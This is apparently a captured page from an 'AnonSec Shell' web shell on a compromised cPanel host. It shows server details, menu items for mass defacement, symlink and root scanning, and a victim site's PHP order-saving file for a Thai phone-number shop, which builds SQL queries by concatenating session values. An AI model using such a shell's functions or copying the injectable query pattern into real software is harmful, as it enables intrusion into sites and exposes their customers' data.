AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/cart/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/cart/cart_saveorder_ber.php
<?php 
include('../include/class.php');
include('../include/sql_injection_get.php');
include("../include/mail.php");
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
/*echo '<pre>';
print_r($_SESSION);
echo '</pre>';*/
?>

<?php
$id = $runid_class->run_id('orders_runid');
$phone2 = str_replace('-', '', $_SESSION["phone"]);

$list_sip = array('table'=>'ems_type','where'=>'id = "'.$_SESSION["shipping"].'"','order'=> "ORDER BY id DESC");				  
$view_sip = $view_db->view($list_sip);
$row_sip = $view_db->q($view_sip);

$list_ji = array('table'=>'province','where'=>'id = "'.$_SESSION['province'].'"','order'=> "ORDER BY id DESC");				  
$view_ji = $view_db->view($list_ji);
$row_ji = $view_db->q($view_ji);

foreach ($_SESSION["cart"] as $key => $value)
{	
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	$total =  $total + $row['price'];
}
$total = $total+$row_ji["price"];

$list = array(	
				'table'=>'orders',
				'id'=>"'".@$id."'",
				'id_mem'=>"'".@$_SESSION['simDed_id']."'",
				'name'=>"'".@$_SESSION["name"]."'",
				'lastname'=>"'".@$_SESSION["lastname"]."'",
				'phone'=>"'".@$phone2."'",
				'email'=>"'".@$_SESSION["email"]."'",
				'address'=>"'".@$_SESSION["address"]."'",
				'province'=>"'".@$row_ji["name"]."'",
				'delivery'=>"'".@$row_sip["name"]."'",
				'delivery_id'=>"'".@$row_sip["id"]."'",
				'delivery_p'=>"'".@$row_sip["price"]."'",
				'total'=>"'".@$total."'",
				'zipcode'=>"'".@$_SESSION["zip"]."'",
				'status'=>'1',
				'createdate'=>"'".$date."'",
				'up_date'=>"'".$date."'"
);
				 $add1 = $actiondata_db->add_db($list);

foreach ($_SESSION["cart"] as $key => $value)
{
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	
	$list = array(	
				'table'=>'order_detail',
				'id_order'=>"'".@$id."'",
				'id_pho'=>"'".@$value."'",
				'id_shop'=>"'".@$row["id_shop"]."'",
				'price'=>"'".@$row["price"]."'",
	);
	$add = $actiondata_db->add_db($list);
	
	$list2 = array(	
			'table'=>'phonenumber',
			'id'=>$value,
			'status'=>'2',
			'up_date'=>$date
	);			  
	$add2 = $actiondata_db->edit_db($list2);
}

$total = 0;
$tb_order = '';
foreach ($_SESSION["cart"] as $key => $value)
{
	
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	
	$phonenumber = $Phone_class->format_phonenumber($row['phonenumber'],$row['format']);
	
	$row_mobilenetwork = $actiondata_db->q_one('mobilenetwork','id = "'.$row['mobilenetwork'].'"','image');
	
	$list_shr = array('table'=>'shop','where'=>'id = "'.$row['id_shop'].'" ');				  
	$view_shr = $view_db->view($list_shr);
	$row_shr = $view_db->q($view_shr);
	
							
	$tb_order = $tb_order . '
	<tr>
		<td><div><a href="'. $upload .$row_shr['codeshop'] .'">'.$row_shr['nameShop'].' </a></div></td>
		<td><div>'.$phonenumber.' </div></td>
		<td><div><img src="'. $upload.'/mobilenetwork/'.$row_mobilenetwork.'" width="50"></div></td>
		<td><div>'. number_format($row['price']) .'</div></td>
	</tr>';
	$total =  $total + $row['price'];
	
	

	$arr_shopid[] =  $row_shr['id'];
	
	
}

$arr_shopid = array_unique($arr_shopid);
foreach ($arr_shopid as $key => $value)
{
	$list_shr = array('table'=>'shop','where'=>'id = "'.$value.'" ');				  
	$view_shr = $view_db->view($list_shr);
	$row_shr = $view_db->q($view_shr);
	$shopdetail = $row_shr['nameShop'] .'<br>'. $row_shr['addressshop'] .'<br>'.$row_shr['email'] .'<br>'.$row_shr['phone'].'<br>'. $shopdetail ;
	
	$email_shop = $row_shr['email'].','.$email_shop; 
	
	
}
$email_shop = $rest = substr($email_shop, 0, -1);
$shopdetail = 'ข้อมูลทางร้าน <br><br>'.$shopdetail;



$sip=$row_sip['price'];
$sumtotal = $total + $sip ;
$tb_order2 ='
<table width="100%" border="0">
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#000;font-size:20px;">
    <td> ราคารวม &nbsp;&nbsp;&nbsp;&nbsp; </td>
    <td>'. number_format($total).'  บาท</td>
  </tr>
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#66be89;font-size:20px;">
    <td>  '.$row_sip['name'].' &nbsp;&nbsp;&nbsp;&nbsp;</td>
    <td>'.number_format($sip).'  บาท</td>
  </tr>
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#F00;font-size:20px;">
    <td> ราคารวม  &nbsp;&nbsp;&nbsp;&nbsp;</td>
    <td>'. number_format($sumtotal).' บาท </td>
  </tr>
</table>
'; 
?>

<?php

$body = 
				'<table width="100%" border="0" cellpadding="10" style="font-size:18px;">
					<tr>
						<td><img src="../images/Logo.png" width="200"></td>
						<td>'.$util_class->day_m_th($date).'</td>
					</tr>
					<tr>
						<td colspan="2">เรียนผู้ใช้บริการ</td>
					</tr>
					<tr>
						<td colspan="2">คุณ '.$_SESSION["name"]. ' '.$_SESSION["lastname"].' <br>
							'.$_SESSION["address"].' <br>
							จ. '.$row_ji["name"].' '.$_SESSION["zip"].'    <br>
							โทร. '.$_SESSION["phone"].' <br>
							Email : '.$_SESSION["email"].'<br>
						</td>
					</tr>
				</table>
				<br><br>
				<table  width="100%" border="1" cellpadding="10"  style="font-size:18px;border:1px solid #666 "> 
                <thead>
                  <tr>
                    <th>ร้านค้า</th>
                    <th width="25%">เบอร์ที่สั่งซื้อ</th>
                    <th width="20%">เครือข่าย</th>
                    <th width="25%">ราคา/บาท</th>
                  </tr>
                </thead>
                <tbody>
				'.$tb_order.'
                </tbody>
              </table>
			  '.$tb_order2.
			  '<br>'.
			  'รอทางร้านดำเนินการ 24-48ชั่วโมง'.'<br><br>'.
			   $shopdetail.
			  '<br><br>'.$contact;
	
$body = $body;

$mail->SetFrom($from, $from);
$mail->AddReplyTo($from, $from);
$mail->MsgHTML($body);
$txt = $txtname. ' :: ยืนยันการสั่งซื่อ ';
$mail->Subject = $txt;
$mail->AddAddress($_SESSION["email"]); // ผู้รับ
$mail->AddAddress($email_shop); // ผู้รับ
$mail->AddAddress("[email protected]", "onnud"); // ผู้รับคนที่สอง
				
if(!$mail->Send()) 
{
	$_SESSION['er'] = 'false';
	echo "<br> Mailer Error: " . $mail->ErrorInfo;
	exit();
}

	unset($_SESSION["cart"]);
	unset($_SESSION["num_cart"]);
	unset($_SESSION["phone"]);
	unset($_SESSION["shipping"]);
	unset($_SESSION["province"]);
	unset($_SESSION["name"]);
	unset($_SESSION["lestname"]);
	unset($_SESSION["email"]);
	unset($_SESSION["address"]);	
	unset($_SESSION["zip"]);	



?>
<?php $or_id =  str_pad($id,5,"0",STR_PAD_LEFT);?>
<meta http-equiv="refresh" content="0;URL=cart_true.php?order=<?php echo $or_id; ?>" />

Anon7 - 2022
AnonSec Team